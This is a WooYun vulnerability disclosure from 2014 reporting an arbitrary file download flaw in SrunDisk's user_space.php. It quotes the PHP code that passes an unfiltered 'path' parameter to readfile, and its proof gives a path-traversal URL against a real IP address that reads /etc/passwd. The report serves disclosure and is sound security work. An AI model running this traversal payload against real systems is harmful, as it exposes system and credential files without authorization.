当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-058487

漏洞标题:深澜软件漏洞SrunDisk任意文件下载

相关厂商:srun.com

漏洞作者: xlz0iza1

提交时间:2014-04-27 13:57

修复时间:2014-07-23 18:34

公开时间:2014-07-23 18:34

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-04-27: 细节已通知厂商并且等待厂商处理中
2014-05-02: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-06-26: 细节向核心白帽子及相关领域专家公开
2014-07-06: 细节向普通白帽子公开
2014-07-16: 细节向实习白帽子公开
2014-07-23: 细节向公众公开

简要描述:

RT

详细说明:

if($res=$shared->gets("","file_type DESC"))
	{
		foreach($res as $k => $v)
		{
			$shid=$v["shid"];
			$path=$v["path"];
			if(!is_file($path))
			{
				$shared->path=$path;
				$shared->del();
				continue;
			}
			
			$path1=substr(strrchr($path,"/"),1);						
			$file_time=date("Y-m-d H:i:s",filemtime($path));
			$member_id=$v["member_id"];
			$member_name=$v["member_name"];
			$type=$res[0]["file_type"];
			$url="user_space.php?username=".$username."&act=shared_show&path=".urlencode($path);
			switch($ftype)
			{
				case 2:
				$url1="<a href='user_space.php?username=".$username."&act=big_pic_show&path=".urlencode($path)."' target='_blank'>";
				break;
				case 3:
				$url1="<a href='#' onclick='return false'>";
				break;
				case 4:
				$url1="<a href='#' onclick='return false'>";
				break;
				default:
				$url1="<a href='user_space.php?username=".$username."&act=shared_show&path=".urlencode($path)."'>";
			}
			if(is_dir($path))
			{				
				$icon="pics/dir_big.gif";
			}
			else
			{
				switch(strtolower(strrchr($path1,".")))
				{
					case ".jpg":
						$icon="user_space.php?act=pic_show&username=".$username."&path=".urlencode($path);						
						break;
					case ".jpeg":
						$icon="user_space.php?act=pic_show&username=".$username."&path=".urlencode($path);
						break;
						
					case ".gif":
						$icon="user_space.php?act=pic_show&username=".$username."&path=".urlencode($path);
						break;
					case ".png":
						$icon="user_space.php?act=pic_show&username=".$username."&path=".urlencode($path);
						break;
					case ".mp3":
						$icon="pics/mp3_big.gif";
						break;
					case ".wma":
						$icon="pics/mp3_big.gif";
						break;
					case ".wmv":
						$icon="pics/mp3_big.gif";
						break;
					case ".mpg":
						$icon="pics/mp3_big.gif";
						break;	
					case ".avi":
						$icon="pics/mp3_big.gif";
						break;
					case ".flv":
						$icon="pics/mp3_big.gif";
						break;
					case ".3gp":
						$icon="pics/mp3_big.gif";
						break;
					case ".swf":
						$icon="pics/mp3_big.gif";
						break;										
					default:
						$icon="pics/file_big.gif";						
						break;
				}
				
			}			
			$eidolon->loopBlock("td");
			$i++;
			if($i>4)
			{
				$i=0;
				$eidolon->loopBlock("tr","td");
				$eidolon->cleanBlock("td");
			}
		}
		$eidolon->loopBlock("tr","td");
	}	
	$shared->cutPage($eidolon);
	$eidolon->parseBlock("_main","tr");
	$eidolon->showBlock("_main");
}
else if($_GET["act"]=="pic_show")
{
	$file_path=$_GET["path"]; 
	if(!file_exists($file_path))
	{
		exit("file not found");
	}
	$w=($_GET["w"])?$_GET["w"]:120;
	$h=($_GET["h"])?$_GET["h"]:120;
	
	if($imgsize=getimagesize($file_path))
	{
			$width=$w;
			$height=$w/$imgsize[0]*$imgsize[1];
	}
	else
	{
			exit;
	}
	if($height>$h)
	{
			$height=$h;
			$width=$h/$imgsize[1]*$imgsize[0];
	}	
	
	$file_type=strtolower(strchr($file_path,"."));	
	
	//switch(exif_imagetype($file_path))
	switch($file_type)
	{
			//case IMAGETYPE_JPEG:
			case ".jpg":
					$im   = imagecreatefromjpeg($file_path);
					break;
			case ".jpeg":
					$im   = imagecreatefromjpeg($file_path);
					break;
			//case IMAGETYPE_PNG:
			case ".png":
					$im   = imagecreatefrompng($file_path);
					break;
			//case IMAGETYPE_GIF:
			case ".gif":
					$im   = imagecreatefromgif($file_path);
					break;
			default:
					exit;
	
	}
	
	$srcW = ImageSX($im);
	$srcH = ImageSY($im);
	$ni=imagecreatetruecolor($width,$height);
	imagecopyresampled($ni,$im,0,0,0,0,$width,$height,$srcW,$srcH);
	header("Content-Type:image/jpeg");
	ImageJpeg($ni);	
}
else if($_GET["act"]=="shared_show")
{
	$file_path=$_GET["path"];
	if(!is_file($file_path))
	{
		exit("error");	
	}
	$file_name=substr(strrchr($file_path,"/"),1);	
	$type  = substr(strrchr($file_path,"."),1);
	switch(strtolower($type))
	{
			case "jpg":
					$mime="image/jpeg";
					break;
			case "jpeg":
					$mime="image/jpeg";
					break;
			case "png":
					$mime="image/png";
					break;
			case "gif":
					$mime="image/gif";
					break;
			default:
					$mime="application/".$type;
	}
	header("Content-Type:".$mime);
	header("Content-Disposition: attachment; filename=".urlencode($file_name));
	readfile($file_path);	
}
else if($_GET["act"]=="big_pic_show")
{
	$file_path=$_GET["path"];
	if(!is_file($file_path))
	{
		exit("error");	
	}
	$file_name=substr(strrchr($file_path,"/"),1);	
	$type  = substr(strrchr($file_path,"."),1);
	switch(strtolower($type))
	{
			case "jpg":
					$mime="image/jpeg";
					break;
			case "jpeg":
					$mime="image/jpeg";
					break;
			case "png":
					$mime="image/png";
					break;
			case "gif":
					$mime="image/gif";
					break;
			default:
					$mime="application/".$type;
	}
	header("Content-Type:".$mime);
	//header("Content-Disposition: attachment; filename=".urlencode($file_name));
	readfile($file_path);	
}
else if($_GET["act"]=="passwd_input")
{
	echo "<form action='user_space.php?username=".$username."' method='post'>请输入密码:<input type='password' name='pass' size='16'><input type='submit' value='提交'></form>";
}


$username $path
$username没有过滤,$path参数只进行了URL编码urlencode($path),导致任意文件下载。

漏洞证明:

漏洞证明:

http://218.75.75.92/user_space.php?username=zaizai&act=shared_show&path=../../../../../../../../../etc/passwd


QQ图片20140425210339.jpg


QQ图片20140425210351.jpg

修复方案:

看了下代码几乎没有过滤,太含糊把。

版权声明:转载请注明来源 xlz0iza1@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-07-23 18:34

厂商回复:

最新状态:

暂无